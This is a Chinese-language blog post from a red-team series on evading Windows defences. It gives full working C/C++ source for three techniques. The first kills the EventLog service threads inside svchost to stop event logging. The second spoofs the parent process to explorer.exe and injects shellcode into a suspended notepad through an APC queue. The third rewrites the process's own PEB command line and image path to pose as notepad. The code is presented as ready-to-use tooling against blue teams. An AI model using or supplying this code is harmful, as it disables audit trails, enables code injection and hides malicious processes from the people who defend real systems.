<h1 id="Windows-日志绕过"><a href="#Windows-日志绕过" class="headerlink" title="Windows 日志绕过"></a>Windows 日志绕过</h1><h2 id="简单介绍-6"><a href="#简单介绍-6" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>通常在红队行动中，面临的最大挑战并不是诸如杀毒、EDR之类的防护软件，红队行动中工具&amp;代码的杀毒绕过只是事前工作(基本功)，所以攻击者使用的工具&amp;代码往往在本地就比较完备的完成了免杀工作，在这样的背景下，如何让工具尽可能少的留下痕迹就成为了红队成员首要解决的问题。</p>
<p>windows系统本身会记录一些较为特殊的操作，如登录、注销，而实现这部分功能通常是由windows自生的服务实现，windows 系统服务主要由svchost.exe进程进行启动和管理，所以识别并结束EventLog的服务线程，从而可以达到绕过windows的日志记录</p>
<h2 id="具体实现"><a href="#具体实现" class="headerlink" title="具体实现"></a>具体实现</h2><p>定位到EventLog服务对应的进程</p>
<p>1.可以通过遍历系统所有进程的commandline是否带有eventlog服务名来进行识别</p>
<p>2.通过调用wmi接口来识别</p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051757714.png" srcset="/img/loading.gif" lazyload alt="image-20251005175701649"></p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051758905.png" srcset="/img/loading.gif" lazyload alt="image-20251005175831818"></p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051758419.png" srcset="/img/loading.gif" lazyload alt="image-20251005175801339"></p>
<p>可以看到这个进程就是拿来进行日志记录的，我们遍历进程，通过命令行参数，就可以定位到日志记录的进程，然后结束掉他就可以了</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br></pre></td><td class="code"><pre><code class="hljs objectivec"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;Windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;tchar.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;winternl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;Tlhelp32.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;strsafe.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">pragma</span> comment(lib, <span class="hljs-string">&quot;ntdll.lib&quot;</span>) </span><br><br><br><span class="hljs-keyword">typedef</span> <span class="hljs-type">long</span> NTSTATUS;<br><br><span class="hljs-comment">/**/</span><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> _THREAD_BASIC_INFORMATION<br>&#123;<br>	NTSTATUS    exitStatus;<br>	PVOID       pTebBaseAddress;<br>	<span class="hljs-built_in">CLIENT_ID</span>   clientId;<br>	KAFFINITY               AffinityMask;<br>	<span class="hljs-type">int</span>						Priority;<br>	<span class="hljs-type">int</span>						BasePriority;<br>	<span class="hljs-type">int</span>						v;<br><br>&#125; THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;<br><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">enum</span> _SC_SERVICE_TAG_QUERY_TYPE<br>&#123;<br>	ServiceNameFromTagInformation = <span class="hljs-number">1</span>,<br>	ServiceNameReferencingModuleInformation,<br>	ServiceNameTagMappingInformation,<br>&#125; SC_SERVICE_TAG_QUERY_TYPE, *PSC_SERVICE_TAG_QUERY_TYPE;<br><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> _SC_SERVICE_TAG_QUERY<br>&#123;<br>	ULONG   processId;<br>	ULONG   serviceTag;<br>	ULONG   reserved;<br>	PVOID   pBuffer;<br>&#125; SC_SERVICE_TAG_QUERY, *PSC_SERVICE_TAG_QUERY;<br><br><span class="hljs-comment">//检查线程的Service Tag，需要调用I_QueryTagInformation函数</span><br><span class="hljs-comment">//函数会将tag信息保存到SC_SERVICE_TAG_QUERY结构体中</span><br><span class="hljs-keyword">typedef</span> ULONG(WINAPI* pI_QueryTagInformation)(PVOID, SC_SERVICE_TAG_QUERY_TYPE, PSC_SERVICE_TAG_QUERY);<br><span class="hljs-keyword">typedef</span> NTSTATUS(WINAPI* pNtQueryInformationThread)(HANDLE, THREAD_INFORMATION_CLASS, PVOID, ULONG, PULONG);<br><br><br><span class="hljs-type">BOOL</span> CheckEventProcess(DWORD ProcessId) &#123;<br>	<span class="hljs-type">BOOL</span> result = <span class="hljs-number">0</span>;<br>	PROCESS_BASIC_INFORMATION pbi = &#123; <span class="hljs-number">0</span> &#125;;<br>	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, <span class="hljs-literal">false</span>, ProcessId);<br>	<span class="hljs-keyword">if</span> (!hProcess)<br>	&#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	DWORD status = NtQueryInformationProcess(hProcess, (PROCESSINFOCLASS)<span class="hljs-number">0</span>, &amp;pbi, <span class="hljs-keyword">sizeof</span>(PVOID) * <span class="hljs-number">6</span>, <span class="hljs-literal">NULL</span>);<br><br>	PPEB ppeb = (PPEB)((PVOID*)&amp;pbi)[<span class="hljs-number">1</span>];<br>	PEB pebdata = &#123; <span class="hljs-number">0</span> &#125;;<br><br>	ReadProcessMemory(hProcess, ppeb, &amp;pebdata, <span class="hljs-keyword">sizeof</span>(PEB), <span class="hljs-literal">NULL</span>);<br><br>	PRTL_USER_PROCESS_PARAMETERS prtlp = (&amp;pebdata)-&gt;ProcessParameters;<br>	RTL_USER_PROCESS_PARAMETERS rtlp = &#123; <span class="hljs-number">0</span> &#125;;<br><br>	ReadProcessMemory(hProcess, prtlp, &amp;rtlp, <span class="hljs-keyword">sizeof</span>(RTL_USER_PROCESS_PARAMETERS), <span class="hljs-literal">NULL</span>);<br><br>	PWSTR lpBuffer = (PWSTR)(&amp;rtlp)-&gt;CommandLine.Buffer;<br>	USHORT len = (USHORT)(&amp;rtlp)-&gt;CommandLine.Length;<br><br>	LPWSTR lpStrings = (LPWSTR)malloc(len);<br><br>	ZeroMemory(lpStrings, len);<br><br>	ReadProcessMemory(hProcess, lpBuffer, lpStrings, len, <span class="hljs-literal">NULL</span>);<br><br>	<br>	<span class="hljs-keyword">if</span> (wcsstr(lpStrings, L<span class="hljs-string">&quot;EventLog&quot;</span>))<br>	&#123;<br>		result = <span class="hljs-literal">true</span>;<br>	&#125;<br><br>	free(lpStrings);<br><br>	<span class="hljs-keyword">return</span> result;<br>&#125;<br><br>DWORD GetEventLogProcessId() &#123;<br>	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, <span class="hljs-number">0</span>);<br>	<span class="hljs-keyword">if</span> (INVALID_HANDLE_VALUE == hSnapshot)<br>	&#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>	&#125;<br>	DWORD logpid = <span class="hljs-number">0</span>;<br>	PROCESSENTRY32W pe32 = &#123; <span class="hljs-number">0</span> &#125;;<br>	pe32.dwSize = <span class="hljs-keyword">sizeof</span>(PROCESSENTRY32W);<br>	<span class="hljs-type">BOOL</span> bRet = Process32FirstW(hSnapshot, &amp;pe32);<br>	<span class="hljs-keyword">while</span> (bRet)<br>	&#123;<br>		<span class="hljs-keyword">if</span> (CheckEventProcess(pe32.th32ProcessID))<br>		&#123;<br>			logpid = pe32.th32ProcessID;<br>			CloseHandle(hSnapshot);<br>			<span class="hljs-keyword">return</span> logpid;<br>		&#125;<br>		bRet = Process32NextW(hSnapshot, &amp;pe32);<br>	&#125;<br>	CloseHandle(hSnapshot);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br><br><span class="hljs-type">BOOL</span> CheckAndFuckEventProcess(DWORD processId, DWORD threadId, PULONG pServiceTag)<br>&#123;<br><br><br>	;<br>	HANDLE hProcess = <span class="hljs-literal">NULL</span>;<br>	HANDLE hThread = <span class="hljs-literal">NULL</span>;<br>	HANDLE hTag = <span class="hljs-literal">NULL</span>;<br>	HMODULE advapi32 = <span class="hljs-literal">NULL</span>;<br>	THREAD_BASIC_INFORMATION tbi = &#123; <span class="hljs-number">0</span> &#125;;<br>	pI_QueryTagInformation I_QueryTagInformation = <span class="hljs-literal">NULL</span>;<br>	pNtQueryInformationThread NtQueryInformationThread = <span class="hljs-literal">NULL</span>;<br>	SC_SERVICE_TAG_QUERY tagQuery = &#123; <span class="hljs-number">0</span> &#125;;<br>	WCHAR Buffer[MAX_PATH] = &#123; <span class="hljs-number">0</span> &#125;;<br><br>	NtQueryInformationThread = (pNtQueryInformationThread)GetProcAddress(GetModuleHandleW(L<span class="hljs-string">&quot;ntdll.dll&quot;</span>), <span class="hljs-string">&quot;NtQueryInformationThread&quot;</span>);<br>	hThread = OpenThread(THREAD_ALL_ACCESS, <span class="hljs-literal">FALSE</span>, threadId);<br>	NtQueryInformationThread(hThread, (THREAD_INFORMATION_CLASS)<span class="hljs-number">0</span>, &amp;tbi, <span class="hljs-number">0x30</span>, <span class="hljs-literal">NULL</span>);<span class="hljs-comment">//内存对齐</span><br>	hProcess = OpenProcess(PROCESS_ALL_ACCESS, <span class="hljs-literal">FALSE</span>, processId);<br>	ReadProcessMemory(hProcess, ((PBYTE)tbi.pTebBaseAddress + <span class="hljs-number">0x1720</span>), &amp;hTag, <span class="hljs-keyword">sizeof</span>(HANDLE), <span class="hljs-literal">NULL</span>);<br><br><br>	advapi32 = LoadLibraryW(L<span class="hljs-string">&quot;advapi32.dll&quot;</span>);<br><br>	I_QueryTagInformation = (pI_QueryTagInformation)GetProcAddress(advapi32, <span class="hljs-string">&quot;I_QueryTagInformation&quot;</span>);<br>	tagQuery.processId = processId;<br>	tagQuery.serviceTag = (ULONG)hTag;<br>	I_QueryTagInformation(<span class="hljs-literal">NULL</span>, ServiceNameFromTagInformation, &amp;tagQuery);<br>	<span class="hljs-keyword">if</span> (tagQuery.pBuffer != <span class="hljs-number">0</span>)<br>	&#123;<br>		StringCbCopyW(Buffer, MAX_PATH, (PCWSTR)tagQuery.pBuffer);<br>	&#125;<br>	<span class="hljs-keyword">else</span><br>	&#123;<br><br>		CloseHandle(hProcess);<br>		CloseHandle(hThread);<br>		FreeLibrary(advapi32);<br>		<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>	&#125;<br>	<span class="hljs-comment">//判断buffer中包含service tag的字符串eventlog</span><br>	<span class="hljs-keyword">if</span> (!wcscmp(Buffer, L<span class="hljs-string">&quot;EventLog&quot;</span>))<br>	&#123;<br>		TerminateThread(hThread, <span class="hljs-number">0</span>);<br>		wprintf((WCHAR*)L<span class="hljs-string">&quot;%d %s\n&quot;</span>, threadId, Buffer);<br>	&#125;<br>	LocalFree(tagQuery.pBuffer);<br>	CloseHandle(hProcess);<br>	CloseHandle(hThread);<br>	FreeLibrary(advapi32);<br><br>	<span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>&#125;<br><br><span class="hljs-type">int</span> main() &#123;<br>	DWORD dwPid;<br><br>	dwPid = GetEventLogProcessId();<span class="hljs-comment">//定位到EventLog服务对应的进程</span><br><br>	<br>	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, <span class="hljs-number">0</span>);<br>	<span class="hljs-keyword">if</span> (INVALID_HANDLE_VALUE == hSnapshot)<br>	&#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>	&#125;<br>	THREADENTRY32 te32 = &#123; <span class="hljs-number">0</span> &#125;;<br>	te32.dwSize = <span class="hljs-keyword">sizeof</span>(THREADENTRY32);<br><br>	<span class="hljs-type">BOOL</span> bRet = Thread32First(hSnapshot, &amp;te32);<br>	<span class="hljs-keyword">while</span> (bRet)<br>	&#123;<br>		<span class="hljs-keyword">if</span> (te32.th32OwnerProcessID == dwPid)<br>		&#123;<br>			<span class="hljs-comment">//找到对应的线程Kill掉</span><br>			CheckAndFuckEventProcess(dwPid, te32.th32ThreadID, <span class="hljs-literal">NULL</span>);<br>		&#125;<br><br><br>		bRet = Thread32Next(hSnapshot, &amp;te32);<br>	&#125;<br>	CloseHandle(hSnapshot);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>&#125;<br></code></pre></td></tr></table></figure>





<p>当然这也只是ring3层的日志欺骗，还有更核心的一个机制ETW会记录操作的痕迹，后面再讲绕过。</p>
<h1 id="父进程欺骗"><a href="#父进程欺骗" class="headerlink" title="父进程欺骗"></a>父进程欺骗</h1><h2 id="简单介绍-7"><a href="#简单介绍-7" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>我们可以自己指定父进程，以增加判断成本从而使蓝队脑阔疼。</p>
<p>使用CreateProcess函数创建新进程时可以通过UpdateProcThreadAttribute( )函数人为修改STARTUPINFOEXA结构体的lpAttributeList成员变量值来指定子进程的父进程</p>
<p>当然也是ring3层的，面对监控内核层的工具，还是一样被发现。</p>
<h2 id="代码实现-4"><a href="#代码实现-4" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;TlHelp32.h&gt;</span></span><br><br><br><span class="hljs-function">DWORD <span class="hljs-title">FindExplorerPID</span><span class="hljs-params">()</span> </span>&#123;<br>	HANDLE snapshot = <span class="hljs-built_in">CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class="hljs-number">0</span>);<br>	PROCESSENTRY32 process = &#123; <span class="hljs-number">0</span> &#125;;<br>	process.dwSize = <span class="hljs-built_in">sizeof</span>(process);<br><br>	<span class="hljs-keyword">if</span> (<span class="hljs-built_in">Process32First</span>(snapshot, &amp;process)) &#123;<br>		<span class="hljs-keyword">do</span> &#123;<br>			<span class="hljs-keyword">if</span> (!<span class="hljs-built_in">wcscmp</span>(process.szExeFile, <span class="hljs-string">L&quot;explorer.exe&quot;</span>))<br>				<span class="hljs-keyword">break</span>;<br>		&#125; <span class="hljs-keyword">while</span> (<span class="hljs-built_in">Process32Next</span>(snapshot, &amp;process));<br>	&#125;<br><br>	<span class="hljs-built_in">CloseHandle</span>(snapshot);<br>	<span class="hljs-keyword">return</span> process.th32ProcessID;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>&#123;<br><br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> shellcode[] = <span class="hljs-string">&quot;&quot;</span>;<br><br>	STARTUPINFOEXA siex;<br>	<span class="hljs-built_in">ZeroMemory</span>(&amp;siex, <span class="hljs-built_in">sizeof</span>(STARTUPINFOEXA));<br>	PROCESS_INFORMATION piex;<br>	SIZE_T sizeT;<br>	siex.StartupInfo.cb = <span class="hljs-built_in">sizeof</span>(STARTUPINFOEXA);<br><br>	HANDLE expHandle = <span class="hljs-built_in">OpenProcess</span>(PROCESS_ALL_ACCESS, <span class="hljs-literal">false</span>, <span class="hljs-built_in">FindExplorerPID</span>());<br><br>	<span class="hljs-built_in">InitializeProcThreadAttributeList</span>(<span class="hljs-literal">NULL</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, &amp;sizeT);<br>	siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)<span class="hljs-built_in">HeapAlloc</span>(<span class="hljs-built_in">GetProcessHeap</span>(), <span class="hljs-number">0</span>, sizeT);<br>	<span class="hljs-built_in">InitializeProcThreadAttributeList</span>(siex.lpAttributeList, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, &amp;sizeT);<br>	<span class="hljs-built_in">UpdateProcThreadAttribute</span>(siex.lpAttributeList, <span class="hljs-number">0</span>, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &amp;expHandle, <span class="hljs-built_in">sizeof</span>(HANDLE), <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);<br><br><br>	<span class="hljs-built_in">CreateProcessA</span>(<span class="hljs-string">&quot;C:\\Windows\\System32\\notepad.exe&quot;</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, (LPSTARTUPINFOA)&amp;siex, &amp;piex);<br><br>	LPVOID lpBaseAddress = (LPVOID)<span class="hljs-built_in">VirtualAllocEx</span>(piex.hProcess, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0x1000</span>, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);<br>	<span class="hljs-built_in">WriteProcessMemory</span>(piex.hProcess, lpBaseAddress, (LPVOID)shellcode, <span class="hljs-built_in">sizeof</span>(shellcode), <span class="hljs-literal">NULL</span>);<br>	<span class="hljs-built_in">QueueUserAPC</span>((PAPCFUNC)lpBaseAddress, piex.hThread, <span class="hljs-literal">NULL</span>);<br>	<span class="hljs-built_in">ResumeThread</span>(piex.hThread);<br>	<span class="hljs-built_in">CloseHandle</span>(piex.hThread);<br><br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051812567.png" srcset="/img/loading.gif" lazyload alt="image-20251005181230355"></p>
<h1 id="进程伪装"><a href="#进程伪装" class="headerlink" title="进程伪装"></a>进程伪装</h1><h2 id="简单介绍-8"><a href="#简单介绍-8" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>在蓝队排查恶意进程过程中，经常会使用processexplorer等进程检查工具进行详细的检测，而通常的恶意进程往往特征会比较明显，这种技术通过伪造PEB进程环境块来伪装自己，让自己的特征不那么明显，从而增加一点存活率。</p>
<h2 id="代码实现-5"><a href="#代码实现-5" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&quot;Windows.h&quot;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&quot;winternl.h&quot;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">typedef</span> <span class="hljs-title">NTSTATUS</span><span class="hljs-params">(*MYPROC)</span> <span class="hljs-params">(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG)</span></span>;<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	HANDLE h = <span class="hljs-built_in">GetCurrentProcess</span>();<br>	PROCESS_BASIC_INFORMATION ProcessInformation;<br>	ULONG len = <span class="hljs-number">0</span>;<br>	HINSTANCE ntdll;<br>	MYPROC GetProcessInformation;<br>	<span class="hljs-type">wchar_t</span> commandline[] = <span class="hljs-string">L&quot;C:\\windows\\system32\\notepad.exe&quot;</span>;<br>	ntdll = <span class="hljs-built_in">LoadLibrary</span>(<span class="hljs-built_in">TEXT</span>(<span class="hljs-string">&quot;Ntdll.dll&quot;</span>));<br><br>	<span class="hljs-comment">//解析ntdll.dll中NtQueryInformationProcess的地址</span><br>	GetProcessInformation = (MYPROC)<span class="hljs-built_in">GetProcAddress</span>(ntdll, <span class="hljs-string">&quot;NtQueryInformationProcess&quot;</span>);<br><br>	<span class="hljs-comment">//获取_PEB对象</span><br>	(GetProcessInformation)(h, ProcessBasicInformation, &amp;ProcessInformation, <span class="hljs-built_in">sizeof</span>(ProcessInformation), &amp;len);<br><br>	<span class="hljs-comment">//替换命令行和映像路径名</span><br>	ProcessInformation.PebBaseAddress-&gt;ProcessParameters-&gt;CommandLine.Buffer = commandline;<br>	ProcessInformation.PebBaseAddress-&gt;ProcessParameters-&gt;ImagePathName.Buffer = commandline;<br>	<span class="hljs-built_in">system</span>(<span class="hljs-string">&quot;pause&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051817241.png" srcset="/img/loading.gif" lazyload alt="image-20251005181736043"></p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051820720.png" srcset="/img/loading.gif" lazyload alt="image-20251005182027508"></p>
<p><img src="C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20251005185814521.png" srcset="/img/loading.gif" lazyload alt="image-20251005185814521"></p>
<p><img src="C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20251005185833125.png" srcset="/img/loading.gif" lazyload alt="image-20251005185833125"></p>
<p>可以清楚的看到，这个对于process hacke这些工具无效，但是对于微软的进程查看工具procexp.exe有效</p>
<p>当然这也只是ring3层的伪装，在ETW上依然能看见。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%9D%82%E8%B0%88/" class="print-no-link">#杂谈</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>《聊聊免杀的那些“把戏”：镂空、伪装和代码藏匿》</div>
      <div>http://example.com/2025/10/05/《聊聊免杀的那些“小把戏”：镂空、伪装和代码藏匿》/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>October 5, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/07/%E3%80%8AETW%E7%BB%95%E8%BF%87%E3%80%81Shellcode%E6%B8%B8%E5%87%BB%E4%B8%8ENTFS%E5%A4%87%E7%94%A8%E6%95%B0%E6%8D%AE%E6%B5%81%E6%9D%82%E8%B0%88%EF%BC%9A%E9%AB%98%E7%BA%A7%E8%A7%84%E9%81%BF%E6%8A%80%E6%9C%AF%E6%BC%AB%E8%B0%88%E3%80%8B/" title="《ETW绕过、Shellcode游击与NTFS备用数据流杂谈：高级规避技术漫谈》">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">《ETW绕过、Shellcode游击与NTFS备用数据流杂谈：高级规避技术漫谈》</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/02/%E6%B3%A8%E5%85%A5%E7%9A%84%E6%8A%80%E8%89%BA/" title="注入的技艺">
                        <span class="hidden-mobile">注入的技艺</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
